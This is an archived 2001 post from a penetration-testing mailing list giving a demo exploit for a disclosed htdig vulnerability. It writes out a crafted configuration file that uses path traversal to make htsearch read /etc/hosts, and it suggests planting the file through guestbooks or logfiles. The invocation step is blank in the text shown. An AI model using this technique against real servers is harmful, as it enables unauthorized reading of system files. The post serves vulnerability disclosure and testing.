Home page logo

pen-test logo Penetration Testing mailing list archives

htdig HOWTO followup
From: "rudi carell" <rudicarell () hotmail com>
Date: Thu, 18 Oct 2001 08:19:09


just wanted to add an example to the recently posted htdig vulnerability ( credits to ghutchis () wso williams edu ) ... the problem is that there is no detailed info on how to test it ..

---cut here---
---cut here---

therefore ... a demo-exploit for a better understanding:

create a file with the following content anywhere on the maschine htdig runs on (be creative an think of guestbooks, logfiles etc etc ..):

---cut here---
nothing_found_file: /etc/hosts
database_base: ${database_dir}/../../../../etc/
word_db: ${database_base}hosts
doc_index: ${database_base}hosts
doc_db: ${database_base}hosts
---cut here---

.. then let htsearch use it :

---cut here--
---cut here---

done ..


security () freefly com

Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp

This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:

  By Date           By Thread  

Current thread:
  • htdig HOWTO followup rudi carell (Oct 18)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]